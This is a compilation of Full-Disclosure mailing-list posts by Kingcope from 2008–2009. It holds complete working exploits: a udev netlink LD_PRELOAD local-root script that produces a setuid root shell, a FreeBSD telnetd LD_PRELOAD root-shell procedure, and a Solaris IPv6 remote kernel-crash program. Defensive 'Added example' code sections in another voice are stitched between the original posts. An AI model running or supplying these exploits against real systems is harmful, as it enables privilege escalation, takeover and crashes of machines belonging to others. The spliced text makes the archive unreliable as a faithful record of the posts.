[Full-disclosure] udev exploit

2009-04-18 Thread Kingcope Kingcope
(see attached)
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique 
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang

cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

int main(int argc, char **argv) {
    char sysfspath[SHORT_STRING];
    char subsystem[SHORT_STRING];
    char event[SHORT_STRING];
    char major[SHORT_STRING];
    char minor[SHORT_STRING];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <netlink pid of udevd>\n", argv[0]);
        return 1;
    }

    /* fake a "block device added" uevent, as the kernel would send it */
    sprintf(event, "add");
    sprintf(subsystem, "block");
    sprintf(sysfspath, "/dev/foo");
    sprintf(major, "8");
    sprintf(minor, "1");

    memset(&address, 0, sizeof(address));
    address.nl_family = AF_NETLINK;
    address.nl_pid = atoi(argv[1]);   /* netlink address of udevd's uevent socket */
    address.nl_groups = 0;

    msg.msg_name = (void*)&address;
    msg.msg_namelen = sizeof(address);
    msg.msg_iov = &iovector;
    msg.msg_iovlen = 1;

    socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

    char message[LONG_STRING];
    char *mp;

    /* uevent wire format: "ACTION@DEVPATH" followed by NUL-separated
       KEY=VALUE records; udevd exports these records into the environment
       of the programs it runs for the event, LD_PRELOAD included */
    mp = message;
    mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
    mp += sprintf(mp, "ACTION=%s", event) +1;
    mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
    mp += sprintf(mp, "MAJOR=%s", major) +1;
    mp += sprintf(mp, "MINOR=%s", minor) +1;
    mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
    mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;

    iovector.iov_base = (void*)message;
    iovector.iov_len = (int)(mp-message);

    sendmsg(socket_fd, &msg, 0);

    close(socket_fd);

    /* give udevd time to run the event's programs with our LD_PRELOAD */
    sleep(10);
    execl("/tmp/suid", "suid", (void*)0);
}

_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

/* runs when the loader maps this library into the root program udevd spawns */
void _init()
{
    setgid(0);
    setuid(0);
    unsetenv("LD_PRELOAD");
    execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
#include <unistd.h>

int main(void) {
    setgid(0); setuid(0);
    execl("/bin/sh","sh",(char *)0);
}
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
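Added example, not kcope's code and not udev's: the check the exploit above relies on being absent. A uevent receiver gets the sender's netlink address in msg_name on recvmsg(); the kernel is the only netlink peer whose address is 0 (bind() always hands a userspace socket a non-zero port id), so a datagram from any other address is forged. Even a genuine datagram must not carry LD_* keys into the environment of the programs the daemon spawns. Function names and UEVENT_MAX are assumptions; build_uevent() exists only to construct test datagrams in the wire format the exploit builds.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/uio.h>
#ifdef __linux__
#include <linux/netlink.h>
#endif

#define UEVENT_MAX 8192   /* assumed receive buffer size */

/* Verdict on one received datagram. */
enum uevent_verdict { UEVENT_OK = 0, UEVENT_BAD_SENDER, UEVENT_BAD_FORMAT, UEVENT_BAD_KEY };

/* Keys the dynamic loader honours; they would be inherited by every program
 * run for the event, which is exactly what the exploit relies on. */
static int is_loader_key(const char *key, size_t klen)
{
    return klen >= 3 && memcmp(key, "LD_", 3) == 0;
}

/* Vet a raw uevent datagram: "ACTION@DEVPATH\0" followed by NUL-terminated
 * KEY=VALUE records.  sender_pid is the nl_pid from msg_name on receive. */
enum uevent_verdict vet_uevent(const char *buf, size_t len, unsigned int sender_pid)
{
    if (sender_pid != 0)
        return UEVENT_BAD_SENDER;               /* not the kernel */

    const char *p = buf, *end = buf + len;
    const char *hdr_end = memchr(p, '\0', (size_t)(end - p));
    if (hdr_end == NULL || memchr(p, '@', (size_t)(hdr_end - p)) == NULL)
        return UEVENT_BAD_FORMAT;               /* no "ACTION@DEVPATH" header */
    p = hdr_end + 1;

    int saw_action = 0, saw_devpath = 0;
    while (p < end) {
        const char *rec_end = memchr(p, '\0', (size_t)(end - p));
        if (rec_end == NULL)
            return UEVENT_BAD_FORMAT;           /* unterminated record */
        const char *eq = memchr(p, '=', (size_t)(rec_end - p));
        if (eq == NULL || eq == p)
            return UEVENT_BAD_FORMAT;           /* not KEY=VALUE */
        size_t klen = (size_t)(eq - p);
        if (is_loader_key(p, klen))
            return UEVENT_BAD_KEY;
        if (klen == 6 && memcmp(p, "ACTION", 6) == 0)
            saw_action = 1;
        if (klen == 7 && memcmp(p, "DEVPATH", 7) == 0)
            saw_devpath = 1;
        p = rec_end + 1;
    }
    return (saw_action && saw_devpath) ? UEVENT_OK : UEVENT_BAD_FORMAT;
}

/* Pack NUL-terminated records into the uevent wire format.  Only used here to
 * construct test datagrams; returns the total length, 0 if it does not fit. */
size_t build_uevent(char *out, size_t cap, const char *const *records, size_t n)
{
    size_t off = 0;
    for (size_t i = 0; i < n; i++) {
        size_t l = strlen(records[i]) + 1;
        if (off + l > cap)
            return 0;
        memcpy(out + off, records[i], l);
        off += l;
    }
    return off;
}

#ifdef __linux__
/* Where the check belongs in a daemon: the sender address comes from
 * msg_name on recvmsg(), never from anything inside the datagram. */
int receive_uevents(void)
{
    struct sockaddr_nl me;
    memset(&me, 0, sizeof me);
    me.nl_family = AF_NETLINK;
    me.nl_groups = 1;                            /* kernel uevent multicast group */
    int fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    if (fd < 0 || bind(fd, (struct sockaddr *)&me, sizeof me) < 0) {
        perror("netlink");
        return -1;
    }
    for (;;) {
        char buf[UEVENT_MAX];
        struct sockaddr_nl from;
        struct iovec iov = { buf, sizeof buf };
        struct msghdr msg;
        memset(&msg, 0, sizeof msg);
        msg.msg_name = &from;
        msg.msg_namelen = sizeof from;
        msg.msg_iov = &iov;
        msg.msg_iovlen = 1;
        ssize_t n = recvmsg(fd, &msg, 0);
        if (n <= 0)
            break;
        enum uevent_verdict v = vet_uevent(buf, (size_t)n, from.nl_pid);
        printf("%s uevent from nl_pid %u\n", v == UEVENT_OK ? "accepted" : "dropped", from.nl_pid);
    }
    close(fd);
    return 0;
}
#endif
```

Run as root on a Linux box, receive_uevents() prints every kernel uevent as accepted and a datagram sent by the script above as dropped, since its sender address is the exploit's own port id, and even a replay with a faked address 0 (which netlink does not allow) would fail on the LD_PRELOAD record.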

[Full-disclosure] udev exploit - SECURITYFOCUS.COM edits your exploits

2009-04-18 Thread Kingcope Kingcope
Hello people, for some reason someone on securityfocus.com thinks he or
she's a genius.
The exploit at
http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2009-04/msg00204.html
and
http://downloads.securityfocus.com/vulnerabilities/exploits/34536.sh
differ so much that the exploit is not even compilable.
Look at the inserted EOF's ..

Dirty little security industry.
Use the exploit at full disclosure and forget about the other.

Cheerio,
kcope



[Full-disclosure] FreeBSD zeroday

2009-02-13 Thread Kingcope Kingcope
FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
and possible remote root code execution.

There is a rather big bug in the current FreeBSD telnetd daemon.
The environment is not properly sanitized when executing /bin/login,
which leads to a (possible) remote root hole.

The telnet protocol allows passing environment variables inside the
telnet traffic and assigning them on the other side of the tcp connection.
The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
environment variables prior to executing /bin/login.
So passing an environment variable with the identifier LD_PRELOAD and
the value of a precompiled library that is on the filesystem of the
victim's box and includes malicious code is possible.
When /bin/login is executed with the user id and group id 0 ('root') it preloads
the library that was set by the remote connection through a telnet environment
definition and executes it.
It is unlikely that this bug can be exploited remotely, but it is not impossible.
An attacker could e.g. upload a malicious library using ftp (including anonymous
ftp users), nfs, smb or any other (file) transfer protocol.
One scenario to exploit the bug remotely would be an ftp server running beside
the telnet daemon that also serves anonymous users with write access. Then the
attacker would upload the malicious library and define the LD_PRELOAD
variable to something similar to /var/ftp/mallib.so to gain remote root access.

Here comes the actual exploit which can be executed with standard UNIX tools.
Paste this into a file using your favorite text editor:
---snip-
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

/* runs when the loader maps this library into /bin/login (uid 0) */
void _init() {
	setenv("LD_PRELOAD", "", 1);
	system("echo ALEX-ALEX;/bin/sh");
}
---snip-

Then we compile this stuff.

---snip-
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
---snip-

Then we copy the file to a known location (local root exploit)

---snip-
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-

...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon,
having set the LD_PRELOAD environment variable to the known location
as a telnet option beforehand.

---snip-
#telnet
auth disable SRA
environ define LD_PRELOAD /tmp/libno_ex.so.1.0
open target
---snip-
ALEX-ALEX
#ROOTSHELL

This will give us an immediate (probably remote) root shell.
This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
with telnetd enabled. Other versions of FreeBSD may also be affected;
OpenBSD and NetBSD were not tested but MAY contain the same bug for
historic reasons.

Signed,
Kingcope[nikolaos rangos]/2009
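Added example, not kcope's code and not FreeBSD's telnetd: how the environment described in the post arrives on the wire, and what a hardened telnetd should keep. The client sends its variables in a NEW-ENVIRON (telnet option 39) IS suboption, RFC 1572: VAR or USERVAR, the name, VALUE, the value, with ESC escaping the four code bytes. The parser below decodes that body, and env_for_login() keeps only an allow-list (TERM, DISPLAY, PRINTER, LANG, LC_*), which is an assumption made for illustration; an allow-list is preferred to stripping LD_* because a deny-list has to be right for every loader and shell variable on every platform. Function and type names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* NEW-ENVIRON (telnet option 39) suboption codes, RFC 1572. */
enum { NE_IS = 0, NE_SEND = 1, NE_INFO = 2 };
enum { NE_VAR = 0, NE_VALUE = 1, NE_ESC = 2, NE_USERVAR = 3 };

struct envvar {
    char name[64];
    char value[256];
};

/* Allow-list of what a peer may set before login runs (assumed list).
 * Everything else, LD_* included, is dropped. */
static int env_name_allowed(const char *name)
{
    static const char *const ok[] = { "TERM", "DISPLAY", "PRINTER", "LANG" };
    for (size_t i = 0; i < sizeof ok / sizeof ok[0]; i++)
        if (strcmp(name, ok[i]) == 0)
            return 1;
    return strncmp(name, "LC_", 3) == 0;
}

/* Copy bytes up to the next unescaped VAR/VALUE/USERVAR code into dst.
 * Returns bytes consumed, or -1 on overflow or a dangling ESC. */
static long copy_field(const unsigned char *p, size_t len, char *dst, size_t cap)
{
    size_t i = 0, k = 0;
    while (i < len && p[i] != NE_VAR && p[i] != NE_VALUE && p[i] != NE_USERVAR) {
        if (p[i] == NE_ESC && ++i >= len)
            return -1;                          /* ESC with nothing after it */
        if (k + 1 >= cap)
            return -1;                          /* field too long */
        dst[k++] = (char)p[i++];
    }
    dst[k] = '\0';
    return (long)i;
}

/* Parse the suboption body between "IAC SB NEW-ENVIRON" and "IAC SE":
 * IS|INFO, then (VAR|USERVAR) name [VALUE value] repeated.
 * Returns the number of variables, or -1 if malformed. */
int parse_new_environ(const unsigned char *p, size_t len, struct envvar *out, size_t max)
{
    if (len == 0 || (p[0] != NE_IS && p[0] != NE_INFO))
        return -1;
    size_t i = 1, n = 0;
    while (i < len) {
        if (p[i] != NE_VAR && p[i] != NE_USERVAR)
            return -1;                          /* expected a variable code */
        if (n == max)
            return -1;
        i++;
        long used = copy_field(p + i, len - i, out[n].name, sizeof out[n].name);
        if (used <= 0)
            return -1;                          /* empty or bad name */
        i += (size_t)used;
        out[n].value[0] = '\0';
        if (i < len && p[i] == NE_VALUE) {
            i++;
            used = copy_field(p + i, len - i, out[n].value, sizeof out[n].value);
            if (used < 0)
                return -1;
            i += (size_t)used;
        }
        n++;
    }
    return (int)n;
}

/* Parse and filter: the environment telnetd should hand to login.
 * Returns the number kept (compacted to the front of out), or -1 if malformed. */
int env_for_login(const unsigned char *sub, size_t len, struct envvar *out, size_t max)
{
    int n = parse_new_environ(sub, len, out, max);
    if (n < 0)
        return -1;
    int kept = 0;
    for (int i = 0; i < n; i++)
        if (env_name_allowed(out[i].name))
            out[kept++] = out[i];
    return kept;
}
```

Fed the body a client sends after "environ define LD_PRELOAD /tmp/libno_ex.so.1.0", parse_new_environ() reports the variable faithfully and env_for_login() drops it; a malformed body (a dangling ESC, an empty name) is rejected outright rather than partially applied.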



[Full-disclosure] Solaris Devs Are Smoking Pot

2009-01-26 Thread Kingcope Kingcope
Regards,
2009/Kingcope
/*
	SunOS Release 5.11 Version snv_101b Remote IPV6 
	Kernel Crash Exploit 0day
	By Kingcope/2009
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

/* a bare 40-byte IPv6 header: payload length 0 and next header 0x3c (60,
   Destination Options) with nothing following it; bytes 24..39 are the
   destination address and are overwritten with the target below */
unsigned char rawData[] =
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
"\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
"\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";

int main(int argc, char *argv[])
{
  struct sockaddr_in6 dst;
  int s;

  if (argc < 2)
  {
    printf("SunOS Release 5.11 Version snv_101b Remote IPV6 Kernel Crash Exploit 0day By Kingcope/2009\n");
    printf("Usage: %s <dst>\n", *argv);
    return(1);
  }

  memset(&dst, 0, sizeof(dst));
  if (inet_pton(AF_INET6, (char *)argv[1], (struct in6_addr *) &dst.sin6_addr) != 1) {
	printf("Error: inet_pton()\n");
	exit(-1);
	}
	memcpy(rawData+24, &dst.sin6_addr, 16);

  dst.sin6_family = AF_INET6;

  s = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);   /* raw socket, needs root */
  if (s == -1)
    return(1);

  printf("Sending IPV6 packet: %s\n", argv[1]);

  if (sendto(s,rawData,sizeof(rawData),0,(struct sockaddr*)&dst,sizeof(dst)) == -1)
  {
	perror("Error sending packet");
	exit(-1);
  }

  return(0);
}

/*
Kernel Crash Dump May Look Like The Following Snippet
[ID 965332 kern.notice] ipsec_needs_processing_v6
[ID 10 kern.notice]
[ID 655072 kern.notice] ff00012b9650 ip:ipsec_needs_processing_v6+10c ()
[ID 655072 kern.notice] ff00012b96f0 ip:ipsec_early_ah_v6+75 ()
[ID 655072 kern.notice] ff00012b9860 ip:ip_rput_data_v6+f4e ()
[ID 655072 kern.notice] ff00012b9940 ip:ip_rput_v6+64e ()
[ID 655072 kern.notice] ff00012b99b0 unix:putnext+21e ()
[ID 655072 kern.notice] ff00012b9a00 dld:dld_str_rx_fastpath+8a ()
[ID 655072 kern.notice] ff00012b9ad0 dls:i_dls_link_rx+2c7 ()
[ID 655072 kern.notice] ff00012b9b50 mac:mac_do_rx+b7 ()
[ID 655072 kern.notice] ff00012b9b80 mac:mac_rx+1f ()
[ID 655072 kern.notice] ff00012b9bd0 e1000g:e1000g_intr+135 ()
[ID 655072 kern.notice] ff00012b9c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ff00012b9c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ff00012c5870 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ff00012c58c0 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ff00012c58d0 unix:cmnint+ba ()
[ID 655072 kern.notice] ff00012c5a00 unix:ddi_mem_putb+f ()
[ID 655072 kern.notice] ff00012c5a40 ata:ata_disk_start_dma_out+88 ()
[ID 655072 kern.notice] ff00012c5a90 ata:ata_ctlr_fsm+1fb ()
[ID 655072 kern.notice] ff00012c5af0 ata:ata_hba_start+84 ()
[ID 655072 kern.notice] ff00012c5b30 ata:ghd_waitq_process_and_mutex_hold+df ()
[ID 655072 kern.notice] ff00012c5ba0 ata:ghd_intr+8d ()
[ID 655072 kern.notice] ff00012c5bd0 ata:ata_intr+27 ()
[ID 655072 kern.notice] ff00012c5c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ff00012c5c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ff0001205ab0 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ff0001205b00 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ff0001205b10 unix:cmnint+ba ()
[ID 655072 kern.notice] ff0001205c00 unix:mach_cpu_idle+b ()
[ID 655072 kern.notice] ff0001205c40 unix:cpu_idle+17b ()
[ID 655072 kern.notice] ff0001205c60 unix:idle+4c ()
[ID 655072 kern.notice] ff0001205c70 unix:thread_start+8 ()
[ID 10 kern.notice]
[ID 672855 kern.notice] syncing file systems...
[ID 904073 kern.notice]  done
[ID 111219 kern.notice] dumping to /dev/zvol/dsk/rpool/dump, offset 65536, content: kernel
[ID 409368 kern.notice] ^M100% done: 56726 pages dumped, compression ratio 3.59,
[ID 851671 kern.notice] dump succeeded
[ID 540533 kern.notice] ^MSunOS Release 5.11 Version snv_101b 64-bit
[ID 172908 kern.notice] Copyright 1983-2008 Sun Microsystems, Inc.  All rights reserved.
*/
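Added example, not kcope's code: a decoder for the fixed IPv6 header that shows what the 40 bytes in rawData actually say, plus the consistency check a receiver needs before following Next Header into the payload. crash_pkt is a copy of the post's rawData with its original destination; function and type names are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IPV6_HDR_LEN 40

/* Copy of the post's rawData (before the destination is patched in). */
static const unsigned char crash_pkt[IPV6_HDR_LEN] = {
    0x60,0xfc,0x57,0x29,0x00,0x00,0x3c,0x56,0x6f,0x35,0x40,0x72,0x70,0x2f,0x52,0x58,
    0xcc,0x95,0x12,0x79,0x30,0xbb,0xbe,0x25,0xfe,0x80,0x00,0x00,0x00,0x00,0x00,0x00,
    0x02,0x0c,0x29,0xff,0xfe,0xf1,0x1e,0xbb
};

struct ipv6_hdr {
    unsigned version;
    unsigned traffic_class;
    uint32_t flow_label;
    uint16_t payload_len;
    uint8_t next_header;
    uint8_t hop_limit;
    uint8_t src[16], dst[16];
};

/* Decode the fixed IPv6 header; -1 if short or the version nibble is not 6. */
int ipv6_decode(const unsigned char *p, size_t len, struct ipv6_hdr *h)
{
    if (len < IPV6_HDR_LEN)
        return -1;
    h->version = p[0] >> 4;
    if (h->version != 6)
        return -1;
    h->traffic_class = ((p[0] & 0x0f) << 4) | (p[1] >> 4);
    h->flow_label = ((uint32_t)(p[1] & 0x0f) << 16) | ((uint32_t)p[2] << 8) | p[3];
    h->payload_len = (uint16_t)((p[4] << 8) | p[5]);
    h->next_header = p[6];
    h->hop_limit = p[7];
    memcpy(h->src, p + 8, 16);
    memcpy(h->dst, p + 24, 16);
    return 0;
}

/* Next Header values that name an extension header the receiver will parse
 * out of the payload: Hop-by-Hop, Routing, Fragment, ESP, AH, Destination Options. */
static int is_extension_header(uint8_t nh)
{
    return nh == 0 || nh == 43 || nh == 44 || nh == 50 || nh == 51 || nh == 60;
}

/* The inconsistency the crash packet carries: Next Header announces an
 * extension header, but Payload Length (and the datagram itself) carries
 * fewer bytes than the smallest such header.  Returns 1 if truncated in
 * that sense (or undecodable), 0 if consistent. */
int ipv6_truncated_ext_header(const unsigned char *p, size_t len)
{
    struct ipv6_hdr h;
    if (ipv6_decode(p, len, &h) != 0)
        return 1;
    if (!is_extension_header(h.next_header))
        return 0;
    size_t min = h.next_header == 51 ? 12 : 8;   /* AH is at least 12 bytes, the rest 8 */
    size_t on_wire = len - IPV6_HDR_LEN;
    size_t avail = on_wire < h.payload_len ? on_wire : h.payload_len;
    return avail < min;
}

static void print_addr(const uint8_t a[16])
{
    for (int i = 0; i < 16; i += 2)
        printf("%s%02x%02x", i ? ":" : "", a[i], a[i + 1]);
}

int main(void)
{
    struct ipv6_hdr h;
    if (ipv6_decode(crash_pkt, sizeof crash_pkt, &h) != 0)
        return 1;
    printf("version %u tclass 0x%02x flow 0x%05x payload_len %u next_header %u hop_limit %u\n",
           h.version, h.traffic_class, h.flow_label, h.payload_len, h.next_header, h.hop_limit);
    printf("src "); print_addr(h.src); printf("\ndst "); print_addr(h.dst); printf("\n");
    printf("truncated extension header: %s\n",
           ipv6_truncated_ext_header(crash_pkt, sizeof crash_pkt) ? "yes" : "no");
    return 0;
}
```

On the post's bytes the decoder reports payload length 0 and next header 60 (Destination Options): an extension header is announced, but no byte of it follows. The backtrace in the post shows the receive path entering the IPsec checks directly from ip_rput_data_v6, which is where a receiver has to have already verified that the announced header is actually there.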

Re: [Full-disclosure] Pwnie Awards 2008

2008-07-21 Thread Kingcope Kingcope
OOPS!:
By question I landed on the Server Side Bug Nomination List Again.
Thanks for riding this Ceremony.

kcope / eliteb0y / Nikos



OOPS I did it again (fool(disclosure))
2008/7/21 David Litchfield [EMAIL PROTECTED]:

 Hey Alexandr,
 I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd
 be more than happy to - after all one bug over 3 years means someone did a
 really good job ;)
 Cheers,
 David

 --
 E-MAIL DISCLAIMER

 The information contained in this email and any subsequent
 correspondence is private, is solely for the intended recipient(s) and
 may contain confidential or privileged information. For those other than
 the intended recipient(s), any disclosure, copying, distribution, or any
 other action taken, or omitted to be taken, in reliance on such
 information is prohibited and may be unlawful. If you are not the
 intended recipient and have received this message in error, please
 inform the sender and delete this mail and any attachments.

 The views expressed in this email do not necessarily reflect NGS policy.
 NGS accepts no liability or responsibility for any onward transmission
 or use of emails and attachments having left the NGS domain.

 NGS and NGSSoftware are trading names of Next Generation Security
 Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
 4BF with Company Number 04225835 and VAT Number 783096402



[Full-disclosure] AFK from full-disclosure

2008-07-19 Thread Kingcope Kingcope
I am reachable
0nly @ two addresses from now on:

http://www.milw0rm.com
http://www.com-winner.com

Thanks n3td3v

[Full-disclosure] AFK from fool-disclosure

2008-07-18 Thread Kingcope Kingcope
I am reachable
0nly @ two addresses:

http://www.milw0rm.com
http://www.com-winner.com

Thanks n3td3v


Signed,
KingCope